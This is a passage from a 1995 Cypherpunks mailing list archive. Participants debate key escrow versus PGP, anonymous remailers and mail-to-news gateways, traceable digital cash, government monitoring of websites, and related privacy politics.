impractical, Prof Thimbleby suggested that a better response was to dilute the pornography with other material. "The Internet has very little interesting material for the non-specialist user. It needs more," he said. "When it has more, it is just possible that pornography will slip into its statistically appropriate place, one aspect of humanity but not the most prominent on the Internet." ----- From pcassidy at world.std.com Wed Sep 13 09:15:56 1995 From: pcassidy at world.std.com (Peter F Cassidy) Date: Wed, 13 Sep 95 09:15:56 PDT Subject: Software vs Money Laundering In-Reply-To: <199509131549.LAA22502@panix.com> Message-ID: On Wed, 13 Sep 1995, Duncan Frissell wrote: > At 10:48 AM 9/13/95 -0400, John Young wrote: > > > Can artificial intelligence be used to combat crime by > > ferreting out money laundering? Officials at law > > enforcement, defense and intelligence agencies like to > > think so. They have suggested creating a sophisticated > > computer program to screen records of the more than > > 700,000 electronic money transfers involving U.S. > > institutions each day and to flag suspicious ones for > > further investigation. By using AI, they hope to stop > > some of the $300 billion in profits from drug deals and > > other illegal activities that they estimate is laundered > > world-wide each year. But in a report issued yesterday, > > the congressional Office of Technology Assessment says > > any such plan would face considerable obstacles. > > [Cyberian Joel Reidenberg, an OTA advisor, is quoted.] > > > > Not the least of which is that money launderers can use "AI Software" to > generate a stream of real and dummy money transfers that emulates "normal" > money transfers. Not to mention the fact that monopoly money transfer > networks that can be surveilled by the Feds (FEDWIRE and SWIFT) are not long > for this world. They will be replaced by encrypted, open, net-based systems. The article failes to point out that this system - actually one much larger in scope already exists as Treasury's FINCEN system, headed by a former Army AI expert. FINCEN sifts all the bank transfer manifests and, last I looked, had stuck tentacles into other agency's databases to further collate and refine its focus - now toward locating potential targets. FINCEN was only supposed to be marshalled for Justice Department investigations of suspected money laundering. Next, it'll be used to auto-author warrants and indictments. . . From andrew_loewenstern at il.us.swissbank.com Wed Sep 13 09:32:16 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Wed, 13 Sep 95 09:32:16 PDT Subject: GAK/weak crypto rationale? Message-ID: <9509131628.AA00879@ch1d157nwk> Brain Davis writes: [...snip...] > Particularly effective were the court-approved video and audio > tapes of the Speaker taking a bribe in exchange for certain action > on legislation [...snip...] > Wiretaps, hidden microphones, and hidden cameras put corrupt > politicians (I know - redundant) out of business. Encryption does little to protect you from hidden cameras and microphones (or informants!). If you already know your target then you can probably get around encryption (sure it's not as simple as a wiretap, but hey, nobody said it had to be easy). Encryption prevents 'fishing expeditions' and unauthorized monitoring; this is what the LEAs don't want to admit. andrew From tcmay at got.net Wed Sep 13 10:16:23 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 13 Sep 95 10:16:23 PDT Subject: Can GAK be made "not interoperable" with PGP? Message-ID: At 2:34 PM 9/13/95, Hal wrote: >I think this is setting up the rationale for software key escrow. One of >the big loopholes in this idea has always been that it would be easy for >bad guys to superencrypt or otherwise bypass the legal encryption. The >response has been that the systems will be designed so that compliant >systems will not interoperate with rogue systems. And the counter-response ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >to that was that criminals (and privacy advocates) would use software >which would operate compliantly with conventional programs and maintain >privacy when talking to other rogue programs. But is this even possible, to make a GAK system "not interoperable" with, say, PGP? Unless the GAK system has some sort of entropy analyzer, and can recognize high-entropy sources which it presumes to be encrypted data (*), one can of course PGP-encrypt a text file and then GAK the resulting file. Many of us are already using PGP mostly in this way, i.e., writing files in text editors, PGP-encryting and getting an ASCII file back, and then sending. GAK will still have to deal with this mode. (* On the idea of entropy analyzers. This is implausible, for many reasons. Any high-entropy file could have the entropy reduced by padding with low-entropy sources. And there would be "false positives." Some ostensibly plaintext posts are so incoherent (;-}) they might be "rejected" by such a GAKalyzer.) So, is any conceivable GAK escrow system possible that cannot be used with other crypto programs? Text is text, unless the GAK program purports to accept or reject the text based on entropy considerations. And I can't imagine that part of the GAK program would be robust against hacking. >This new line will be used to respond to this argument, I think. Even if >it is admitted that there is no way for the government to be able to tell >what the criminals say amongst themselves, it will still be useful to be >able to tell what they say to other people. Therefore software key >escrow will be argued to still be useful even though it can be defeated. But such traffic analyis is made moot by remailers, as we all know. What I think we may be facing, if the folks pushing GAK are really serious about all this, are restrictions on *who we may mail to*!!! For if Alice is "allowed" to send a message, GAKked or not, to a remailer.... (I can speculate about laws saying only "internationally registered" sites can use e-mail, but this seems impractical in the extreme...lots of issues.) The GAK advocates need to realize that superencryption will be as easy as it is today to use PGP, and that even traffic analysis will be defeated if remailers are used. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From yihchun at u.washington.edu Wed Sep 13 10:21:27 1995 From: yihchun at u.washington.edu (Yih-Chun Hu) Date: Wed, 13 Sep 95 10:21:27 PDT Subject: Scientology tries to break PGP - and In-Reply-To: Message-ID: On Wed, 13 Sep 1995, Andy Brown wrote: > On Wed, 13 Sep 1995, Henry W. Farkas wrote: > > > If decrypted with the "alternate" or "fake" secret key, the encrypted file > > is wiped until it reaches a marker; the remainder of the file is > > displayed. If you use your "primary" or "real key", the extraneous text > > is simply stripped. > > Useless I'm afraid. They have the source code and have disabled your > "feature" and attached loud alarm bells to it. > I don't see whats wrong with removing any checking done by PGP. (ie don't keep a checksum or whatever) After all, they can't prove that you didn't just encrypt a pgp +makerandom file. Obviously, I would not want to use this "feature" in some cases, so make adding a checksum be an extra command line option. The new feature would of course not be backwards compatible, but there is no way to disable the "feature" and no way to attach loud alarm bells. Of course, you are then faced with giving them a key which you know will decrypt the file to gibberish. Ideally, you would steno the encrypted file. +---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+ | http://www.cs.washington.edu/homes/yihchun yihchun at cs.washington.edu | | http://weber.u.washington.edu/~yihchun yihchun at u.washington.edu | +---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+ | 1024/E50EC641 B2 A0 DE 9E 36 C0 EB A6 F9 3E D2 DD 2F 27 74 79 | | 2047/DF0403F9 18 EB 62 C8 7F 06 04 67 42 76 24 E2 99 D1 07 DC | +---- Random Thought ------------------------------------------------------+ |I conducted an experiment to test Murphy's Law, but everything went wrong.| +--------------------------------------------------------------------------+ From tcmay at got.net Wed Sep 13 10:48:20 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 13 Sep 95 10:48:20 PDT Subject: CYPHERPUNK considered harmful. Message-ID: At 10:43 AM 9/13/95, Peter Trei wrote: > "CYPHERPUNK" considered harmful > > I would like to propose that we, the 'cypherpunks', are making a >strategic error, which will make it far more difficult to achieve the >goal we share. Discussing some goals we might share, or ought to share, is certainly not out-of-line. Indeed, this discussion has come up many times on this list, though perhaps not much in the past year. (Those C coders do seem to be having their way...:-} ). > Our error lies in our approach to encouraging the widespread use of >crypto. It is an error of hubris - overweening pride. I think many people here are doing a lot to encourage wide use of encryption, remailers, etc. They write hooks to popular mail programs, they give public talks, they fight against restrictions and regulations, and they deploy new systems. That some folks have very occasionally mentioned "Joe Sixpack" does not mean that much. in my opinion. > > We too often think of ourselves as an elite - smarter and better in >various ways to our non-cpunk neighbours. We refer to these others as >'Joe Sixpack" and other such derogatary terms. > > The problem is that in doing so we are marginalizing ourselves. > > We call ourselves 'cypherpunks'. While this is derived from the SF >term 'cyberpunk', consider the image we are creating for ourselves: > > A 'punk' is a marginalized young adult, one who rejects the norms >of his or her society, and takes delight in irking those around him with >his or her rejection. The older of us will think of James Dean in 'Rebel >Without a Cause', or Brando in 'The Wild One'. Later, you get images >such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and >other icons of the 'punk rock' movement. While I have had some qualms about the name, on balance I think it has been good for us. After all, it's not as if _other_ groups don't already exist! In particular, the British branch of Cypherpunks disliked the name "Cypherpunks" so much that they used a different name for themselves, the "U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for whatever reasons. But the name may have been a factor, at least. Similarly, there's the Libertarian Party, with similar themes to our own, the International Association of Cryptographic Research (or somesuch), and even several nascent groups like "Terra Libre" and "DigitalLiberty" which purport to have a similar focus to what we have. And of course there are _several_ groups devoted specifically to lobbying for various sorts of cyberspatial rights, laws, etc.: EFF, EPIC, CPSR, VTW, and the ACLU. All of these groups have a different focus than we have. If I were to pick one that matches Peter Trei's proposed organization, it would be the EFF. Thus, I suggest Peter and others of like mind look into helping out the EFF in its worthy causes. I mean no disrespect here to Peter's views, nor am I suggesting he leave this list. Plenty of room for support of the EFF and being on this list. I'm a member of the EFF, for example (though their computer has me as "Tim Mat" for some reason). But for some reason--draw your own conclusions--the Cypherpunks list has a membership of something like 600-800 subscribers, more if you count folks who subscribed for a while, or who read it in other places. I don't think "Terra Libre" or "DigitalLiberty" are quite as successful and visible. We fill a certain niche which is useful to have filled, a more radical facet of things. If we didn't exist, or renamed ourselves "Concerned Citizens for Cryptographic Protection," CCCP, then somebody would have to _invent_ the Cypherpunks! I addressed the issue of our name, pluses and minuses, in an early chapter of my Cyphernomicon (http://www.oberlin.edu/~brchkind/cyphernomicon/): 2.4.10. "Where did the name 'Cypherpunks' come from?" + Jude Milhon, aka St. Jude, then an editor at "Mondo 2000," was at the earliest meetings...she quipped "You guys are just a bunch of cypherpunks." The name was adopted immediately. - The 'cyberpunk' genre of science fiction often deals with issues of cyberspace and computer security ("ice"), so the link is natural. A point of confusion is that cyberpunks are popularly thought of as, well, as "punks," while many Cyberpunks are frequently libertarians and anarchists of various stripes. In my view, the two are not in conflict. - Some, however, would prefer a more staid name. The U.K. branch calls itself the "U.K. Crypto Privacy Association." However, the advantages of the name are clear. For one thing, many people are bored by staid names. For another, it gets us noticed by journalists and others. - - We are actually not very "punkish" at all. About as punkish as most of our cyberpunk cousins are, which is to say, not very. + the name - Crypto Cabal (this before the sci.crypt FAQ folks appeared, I think), Crypto Liberation Front, other names - not everybody likes the name...such is life -------- Getting back to your suggestion that "we" change the name to something more respectable. How could "we" do this, given that "we" are an effective anarchy? I can't imagine a vote on this, and the endless debates on what "we" ought to call ourselves would be a waste of time. Fortunately, there's an elegant solution: form your own group. Form your own group, your own mailing list, with a catchy name, something like "The Privacy Education Foundation," or "The American Civil Liberties Union" (whoops, taken), or "The Society for the Preservation of Cyberspatial Liberty." Then announce it on our list, and elsewhere. People will vote with their feet. If your "meme" is catching, your list will rapidly gain members. Maybe this Cypherpunks list will even atrophy away. Evolution in action. The market in action. A better approach than trying to get the name and the charter changed. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tedwards at Glue.umd.edu Wed Sep 13 10:52:48 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Wed, 13 Sep 95 10:52:48 PDT Subject: An opportunity not to be missed In-Reply-To: <199509131610.MAA26686@panix.com> Message-ID: On Wed, 13 Sep 1995, David C. Lambert wrote: > I propose that we get some likely candidate (actually, a similar candidate > to the one above) to advocate the benefits of anonymity on the net. Try Harry Browne (http://www.rahul.net/browne). I'm 100% certain that he would be willing to support cryptographic rights and freedom of internet speech. > You may ask why these candidates would be interested in this type of thing, > and my response is that they can be forced. The religious right has no > problem bringing their agenda into the public spotlight and forcing their > issues onto candidates because of their willingness to use hyperbole and > fanaticism (not to mention pressure on advertisers and other sponsors). The Religious Right brings their agenda to the public spotlight because they become incredibly involved in local politics on a nationwide basis and have the knowledge, means, and money to influence politics at this level. Very few people who are outside the political process realize the amount of organization, dedication, and dollars required to achieve political validity. -Thomas Edwards From bdavis at thepoint.net Wed Sep 13 11:33:00 1995 From: bdavis at thepoint.net (Brian Davis) Date: Wed, 13 Sep 95 11:33:00 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <199509131412.KAA26837@panix.com> Message-ID: On Wed, 13 Sep 1995, Duncan Frissell wrote: > At 06:03 PM 9/12/95 -0400, Brian Davis wrote: > > >Unbelievable!!! To add to this distressing truth, I have learned that > >the White House also subscribes to a number of newspapers and periodicals > >which are reviewed for things of interest to the Administration and to > >the President. I I I I I I ammmmmmmmmm shocked! > > The government, as you no doubt know, sometimes operates under different > rules. Thus when the "Red Squad" (Intelligence Division) of the New York > City Police (located in that big building on the North side of Vandam > between Greenwich and Houston BTW) was sued for maintaining files on "lawful > protest groups" they entered into a consent agreement to refrain from this > sort of thing. Later, the courts said that this agreement meant that the > cops couldn't even listen to WLIB radio (NYC's favorite radical > African-American station) to find out in advance where rallies were going to be. > I am not familiar with this incident, but I note that state authorities, not federal, were involved according to your post. Was the consent decree also filed in state court? And even if it was in federal court, was the legal theory on which the plaintiffs proceeded based on NY state law or federal law?? > Since the White House is doing this reading of sites with public funds and > since that institution is the most powerful in the world --- it can nuke its > enemies, for example --- people are naturally interested to discover if they > are the subject of an investigation. > The White House also reads publicly available newspapers and magazines (I assume). How is accessing a Web site different from that? > This is a demonstration of the unintended effect of electronic surveillance > technology. The fact is that it can do more harm to the authorities than to Is the World Wide Web your idea of "electronic surveillance technology"?? I would agree that packet sniffing is a different problem, but accessing an open Web site seems reasonable to me. Would you prefer that the staffers use home computers to do this (in an attempt to hide their tracks)? As far as I know, this was all done openly and the Web site chose, right or wrong, to reveal the contents of their log files to someone. Again, what about the complaints heard in this forum recently about law enforcement's obtaining similar log files from the Web site set up regarding the child's kidnapping? > the public. The Nixon Tapes/The Thompson Square Park Riot Video/The Rodney > King Video. Since those in power are more interesting than ordinary people, > they represent a more "target-rich environment." Information about their > activities has greater commercial value and is thus more likely to see the > light of day. Not only "those in power" but those in the public eye/public figures. On that rationale, Phil Zimmermann is probably a public figure with respect to encryption ... > DCF > > "There are more of us than there are of you." ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ That, of course, depends on what you mean by "us" and "you." EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From loki at obscura.com Wed Sep 13 11:35:04 1995 From: loki at obscura.com (Lance Cottrell) Date: Wed, 13 Sep 95 11:35:04 PDT Subject: Mixmaster posting poll Message-ID: I think that I am not being clear enough about what I want to do. Back when I started running remailers, I was using a machine with no local news software at all. Rather than compile a bunch of software just to allow the "Anon-Post-To:" command to work, I hacked the scripts to automatically send those messages to a mail2news gateway. Mixmaster now has a similar built in anonymous posting ability. If you have inews on your machine, then Mixmaster can build the "Newsgroups:" header and send the message to inews. But what if you are running Mixmaster and you don't have inews but you want to support posting? The answer is to have Mixmaster put together a message to send to a mail2news gateway for it to post. When I look at the currently available public mail2news gateways, I see that two standards already exist. The first is the group.name at gateway. The other is mail2news at gateway with a "Newsgroups:" header. It is easy for me to have mixmaster take the request for anonymous posting, and build the appropriate message for whichever kind of gateway I want to use. I only want to support one of them. The question is, which one should I support? Which are there more of. Which are there likely to be more of in the future. I seem to recall that someone on this list wrote some mail2news software, Who was it and which standard did it follow (if either). Has anyone installed it? Is anyone else planning to install it. I will install a gateway when I get my T1 (in a couple of months). -Lance At 8:35 AM 9/13/95, Rich Salz wrote: >> If the form alt.usenet.group at remailer.com was used, wouldn't the >> system running the remailer have to have an alias defined for each and >> every newsgroup that it plans on handling? > >No. Sites running sendmail, for example, could set up rules that >just knew the top-level hierarchies and fed those into a special >"mailer" that gatewayed them. > >My opinion is that making any names well-known is a bad idea, and >that attaching special semantics to "mail2news at xxx" is a real bad >idea. Instead, just send the message to the specified recipient >and let do whatever magic needs to be done. > >If mixmaster wants to function as a mail/news gateway, it should >do something special when it sees the Newsgroups header -- process >the message and feed it into rnews, presumably. > >I guess, but not yet having read the code do not know, that this is >cleaner and more easily extensible (or removable). > /r$ ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From dcl at panix.com Wed Sep 13 11:57:21 1995 From: dcl at panix.com (David C. Lambert) Date: Wed, 13 Sep 95 11:57:21 PDT Subject: An opportunity not to be missed Message-ID: <199509131857.OAA08914@panix.com> -----BEGIN PGP SIGNED MESSAGE----- Thomas Grant Edwards wrote: > The Religious Right brings their agenda to the public spotlight > because they become incredibly involved in local politics on a > nationwide basis and have the knowledge, means, and money to > influence politics at this level. Very few people who are outside > the political process realize the amount of organization, dedication, > and dollars required to achieve political validity. This is a well made point, and I certainly do not claim to be one of those who has an internal understanding of the political process. I submit that the frenzied coverage of the presidential campaign *severely reduces* the required knowledge, means and money, needed to raise issues to the fore, and that furthermore, a lot of the "means and money" that you mention are used for communication and organization. Of course, an organized campaign on the Net is essentially free, but for the cost in time. It is my opinion that the political power of the Net is just starting to awaken, and that a perception of impotence in the political process, is just that - a perception. David C. Lambert dcl at panix.com (finger for PGP public key) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFcpYKpplsfgM88VAQF8lgP8CViP3ggK68e5l6KGTqcI/2uHp0cP6z9t a2etUdxH0QBuyWu3MVVsWuB+6n6QcRSO69rh0E/U5apzqJoPMdirbLt8B/cMdsAg yY4vfEhGLZkuG5470uP9GKR6TF00YiZmfIoXtfDJPmbfcRwj018S1xe7myeGyLJm ARpzGgrYR30= =r3ff -----END PGP SIGNATURE----- From frissell at panix.com Wed Sep 13 12:26:55 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 13 Sep 95 12:26:55 PDT Subject: Can GAK be made "not interoperable" with PGP? Message-ID: <199509131926.PAA14444@panix.com> At 10:26 AM 9/13/95 -0700, Timothy C. May wrote: >But is this even possible, to make a GAK system "not interoperable" with, >say, PGP? > >Unless the GAK system has some sort of entropy analyzer, and can recognize >high-entropy sources which it presumes to be encrypted data (*), one can of >course PGP-encrypt a text file and then GAK the resulting file. I took it to mean that they were saying that an approved program on one end of a communication exchange could not exchange encrypted messages or established an encrypted session of some kind with an un approved program on the other end. Not trying to outlaw superencryption (PGP on both ends using a GAKed channel) but GAK on one end working with an unapproved system on the other end. A ringer GAK-work-alike that would defeat the intent of GAK. I don't know if the government can prevent that with a software-only system or indeed if half a secure system can be made completely secure. DCF "Markets and open systems beat governments and closed systems." From frissell at panix.com Wed Sep 13 12:27:18 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 13 Sep 95 12:27:18 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <199509131926.PAA14458@panix.com> At 10:57 AM 9/13/95 -0700, Timothy C. May wrote: >While I have had some qualms about the name, on balance I think it has been >good for us. After all, it's not as if _other_ groups don't already exist! >In particular, the British branch of Cypherpunks disliked the name >"Cypherpunks" so much that they used a different name for themselves, the >"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for >whatever reasons. But the name may have been a factor, at least. Note too that Brits differ from Americans. "Wired" worked well here from the beginning but has had problems there. Differing national characteristics. DCF "Let's all just agree to disagree. My system can thrive with widespread disagreement among rabid individualists --- can yours?" From futplex at pseudonym.com Wed Sep 13 12:53:13 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 13 Sep 95 12:53:13 PDT Subject: Corporate Use of Anon WWW Proxies Message-ID: <9509131953.AA19241@cs.umass.edu> [I pulled this from the firewalls list (use majordomo at greatcircle.com to join)] Alex Eveleigh writes: > Subject: Monitoring Activity on the Internet [...] > I would like to get some opinions on how easy it would be for someone > to monitor what information is being accessed on the Internet by our > company. For example how easy would it be for our competition monitor > all sites that people in our company are accessing and what > information we are pulling off the Internet. This struck me as rather ironic in the wake of The Govt. Could Be Reading _Your_ Home Page. It also sparked me to draw the short connection between industrial espionage (and simple industrial nosiness), and anonymous Web proxies. An obvious point, really, but companies often have an interest in concealing the nature/extent of their Web crawlings, too. Perhaps there's a market niche, or a few pro-anonymity publicity points, here for someone. -Futplex "Everybody's got something to hide except for me and my monkey" -J.L. & P.McC. From futplex at pseudonym.com Wed Sep 13 13:08:02 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 13 Sep 95 13:08:02 PDT Subject: Minor Risk to LSB Steganography Message-ID: <9509132007.AA19945@cs.umass.edu> Last week I attended a lecture given by Dexter Kozen at Cornell, on "Efficient Algorithms for Optimal Transmission of Video Data". He mentioned in passing a couple of approaches to choosing data that may acceptably be lost in the process (i.e. without excessive picture quality degradation). One scheme (which I believe counts as a "corona method") involves simply discarding the LSBs of all the encoded pixels or whatnot. This method was not at all a focus of the talk. Anyway, I thought I'd mention it as another minor potential threat to the use of LSB steganography in video transmission, e.g. MPEG streams. -Futplex From m1smf99 at FRB.GOV Wed Sep 13 13:48:22 1995 From: m1smf99 at FRB.GOV (Scott M Fabbri) Date: Wed, 13 Sep 95 13:48:22 PDT Subject: An opportunity not to be missed In-Reply-To: <199509131857.OAA08914@panix.com> Message-ID: <9509132022.AA27925@arcss5.FRB.GOV> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From adam at bwh.harvard.edu Wed Sep 13 14:21:23 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 13 Sep 95 14:21:23 PDT Subject: An opportunity not to be missed In-Reply-To: <199509131857.OAA08914@panix.com> Message-ID: <9509132119.AA03389@waller.harvard.edu> | Of course, an organized campaign on the Net is essentially free, | but for the cost in time. It is my opinion that the political power | of the Net is just starting to awaken, and that a perception of | impotence in the political process, is just that - a perception. An organized campaign anywhere, for any purpose, is not free, since it will require good people to run and organize it. The Key cracking ring only did what we all knew it could do becuase Hal, Adam and several other good folks took the time to do it. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From hfinney at shell.portal.com Wed Sep 13 14:22:36 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 13 Sep 95 14:22:36 PDT Subject: Digital Cash on sci.crypt Message-ID: <199509132121.OAA25994@jobe.shell.portal.com> There has been some discussion on sci.crypt of digital cash and its facilitation of kidnapping, extortion, etc. Here is a posting I made when mentions an on-line paper on the topic. I had met the author, Markus Jakobsson, at Crypto 95, but I only had a chance to check out his web site yesterday. awc at slcawc.aug.ipp-garching.mpg.de (Arthur Carlson TOK ) writes: >[In response to a discussion of whether digital cash could be used to >provide anonymous collection of ransom money] >Is there really no technical fix for this? To enable the prevention of >double spending in off-line systems, the ID of the withdrawer is coded >into the coins in a way that is verified by the bank. If the victim's >relatives can undo enough of the code to satisfy the bank, why can't >they undo the rest to detect when the coins are spent? Alternatively, >why can't the bank put an identifier on the coins (in a way that isn't >destroyed by the unblinding) that amounts to a message encoded in the >public key of the withdrawer? Then the withdrawer can make the >destination of the ransom money visible by revealing his private key >(after the victim has been released, of course). (He also reveals >every dime he spent in the last year and all his kinky love letters, >but, hey, we're trying to catch a kidnapper here.) There has been considerable discussion of this problem in the literature recently. A paper I found yesterday on the net is by Markus Jakobsson and Moti Yung: Revokable and Versatile Electronic Money, at (postscript format). It has references to other work as well. The specific attack I discussed earlier applies to the current DigiCash scheme (or at least how it is assumed to work). Offline cash systems would be more complicated. The references in the paper mentioned above describe how these attacks would work on such systems and some ways of avoiding them. However there is a more powerful attack, which the Jakobsson paper addresses, in which the bank as a whole is coerced. Maybe terrorists threaten to blow up the World Trade Center unless Citibank engages in a specific protocol which will leave the terrorists with millions of dollars in fully blinded electronic cash. Even if the normal withdrawal protocol has signatures, etc. which would prevent this, Jakobsson shows that there is a corrupted protocol which if the bank is forced to follow it will leave the criminals with valid but untraceable electronic cash. The solution in the paper is to make it so that none of the ecash issued by the bank is untraceable. Under normal use it is anonymous, but if necessary the authorities can break the anonymity. This is sometimes called "Clipper cash" after the U.S. Clipper chip proposal which had similar privacy properties. With Jakobsson/Yung's approach even the more powerful attack can be defeated because the cash is traceable, and no amount of coercion will allow the attacker to create valid but untraceable cash. While these approaches are technically interesting, the political implications are more ominous. While Jakobsson labels the entity who has the power to break the anonymity an "ombudsman", implying that he defends the interests of the cash holder, he could equally well be called a "policeman" because he is the one who catches the criminals. It is all a matter of how you look at it. The question is whether these various threats of kidnapping, blackmail, extortion, etc. are good enough reasons to go to a cash system where privacy is protected only at the sufferance of government agencies. There are plenty of precedents for governments misusing supposedly- private information, such as the use of phone records to track down those who resisted the German regime during World War II. One of the attractive aspects of electronic cash has been its immunity to this form of governmental coercion. The overwhelmingly negative response to the Clipper chip proposal (other than in the cryptographic and law enforcement communities) may apply to Clipper cash as well. A related issue is the possible competition of rival cash systems. As with Clipper, where it would apparently be necessary to forbid the use of alternatives, so with Clipper cash it would seem that people would prefer true anonymity over conditional protection, even if you call the cash tracer an "ombudsman". So there would seem to be a need for governments to criminalize the use of fully anonymous electronic cash in order to force people to use the ones which the government could track. Whether this will even be possible in an increasingly global financial system remains to be seen. Hal Finney hfinney at shell.portal.com From vznuri at netcom.com Wed Sep 13 14:24:10 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 13 Sep 95 14:24:10 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: Message-ID: <199509132121.OAA05728@netcom23.netcom.com> TCM: > Although I am >thought of as a "crypto anarchist," and basically am such a thing, the fact >is that there aren't a lot of trials for thoughtcrime in this country. I >have some doubts about the circumstances surrounding Danny Casolaro's >death, though, so I don't say all is rosy and perfect. amusingly, on one of those web sites, the death of Casolaro is indeed tied in with the conspiracy that "touched" (to say the least ) Vince Foster. the Whitehouse web hits are potentially interesting. I agree they don't imply any "dissident web monitoring program". the question of how high a staffer hit those pages and for what reasons is still unanswered. if it was indeed just Joe Sixpack on a presidential tour, playing with the machines, not even employed with the whitehouse, or perhaps some bored college intern, then I agree that nothing significant is going on. but it is fun to fantasize about Hillary or Bill getting an eyeful and thinking that *pornography* on the internet pales in comparison to *this* little problem!! now, those "dissident" web sites are not as innocuous as you might think. they are not run-of-the mill "I hate the president and republicans too" sites. one of them is the absolute master repository on the internet for all the rampant, hardcore Foster conspiracy theories talking about NSA bank spying, whitewater, etc. these are *not* something you would find in a library, or expect anyone without an interest in conspiracy theories to be reading. and from what the article suggests, the browsing was pretty thorough. it would be interesting to ask the site maintainer, something I might do. I suspect that a lot of this Foster stuff is going to hit the media big time when the mud starts to sling during the presidential election, when it really counts. I think that someone is sitting on a lot of anti-clinton ammo. the 3rd candidate possibilities are very strong in 96, because of all the junk coating the Republicrats and Demopublicans. recall that the "october surprise" suspicions regarding Reagan really hit the media big time, and supposedly that was a highly secret intelligence operation. so I think that there is a kind of rough government accountability, it's just that it only happens about every 4 years or so and is *awfully* messy.. --Vlad Nuri From adam at bwh.harvard.edu Wed Sep 13 14:33:33 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 13 Sep 95 14:33:33 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <9509131539.AA17341@cantina.verity.com> Message-ID: <9509132131.AA03432@waller.harvard.edu> (Phill Hallam Baker's request that we respect the privacy of Government employees started this thread) | > Sure. I'll respect their privacy as much as they, and the | > organizations they oversee, respect mine. I'll use as the | > respresentative organizations the IRS and the Social Security | > Administration, which respects my pricvacy so much that they use | > prison inmates to process paperwork. | > | > If I was in a nasty mood, I'd add the USPS. | > | > Sarcasm aside, they show no interest in other people's | > privacy. Why should we go out of our way to do anything but show them | > how bad the situation is? | Oh please! Some clerk browses the internet and you don't want to respect | their privacy because of the IRS? This makes sense how? I suppose that | you're going to dig up information about me and spread it around the | internet because you have issues about the company I work for? First off, I was being somewhat sarcastic, as you might have noticed from several things, not the least of which was the phrase 'sarcasm aside.' That said, why should I respect the privacy of government employees? There is a substantial difference between government and private companies, in that I am not compelled in any way to do business any private company. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From unicorn at polaris.mindport.net Wed Sep 13 15:11:28 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 13 Sep 95 15:11:28 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Duncan Frissell wrote: > > On Thu, 7 Sep 1995, Black Unicorn wrote: > > > Telecoms will certainly break the professional > > > monopoly of lawyers (and other professionals). > > > > This I don't. How do you mean exactly? > > Licensing requires the ability to outlaw unlicensed transactions. > Since the Net trumps censorship and allows consultations at a > distance, it cracks licensing, But won't clients insist on proper credentials in one form or another? Doesn't the practicality and accountability of a centralized authority (or several authorities) provide the best answer to this? Who is going to accept my signature promising that I did indeed get a law degree and pass the bar? I don't see how the net will eliminate the basic need for highly qualified professionals and the proof that they have credentials. Perhaps diplomas and such will be transfered into digital signatures for the institutions, but I can't see how this "cracks" any "monopoly." Perhaps the monopoly is shifted to those who have diplomas, rather than those "licensed to practice" but so what? > > DCF > From hallam at w3.org Wed Sep 13 15:19:26 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 13 Sep 95 15:19:26 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <199509132121.OAA05728@netcom23.netcom.com> Message-ID: <9509132218.AA25328@zorch.w3.org> >I suspect that a lot of this Foster stuff is going to hit the media big >time when the mud starts to sling during the presidential election, >when it really counts. I think that someone is sitting on a lot >of anti-clinton ammo. the 3rd candidate possibilities are very strong >in 96, because of all the junk coating the Republicrats and Demopublicans. I don't think that there will be anything on Foster, if anyone had anything they would have used it. All that has come up is that some of Fosters files marked secret were placed in a safe after he committed suicide. What is going to happen is that a lot of the mud is going to get rebutted, on both sides. Take the Hillary Clinton Cattle deals for example, the media claim was that Hillary invested $1,000 and made $100,000. This is not true. She was asked to put up $1,000 as margin by her broker. Margin is not invested, it is simply a down payment on risk capital. Her broker knew that Hilary could cover very much more if there was a margin call. Hillary was selling options not buying them. In the selling game you have unlimited liability but can only make a fixed profit. If you lose selling an option the money is only due at the end of the 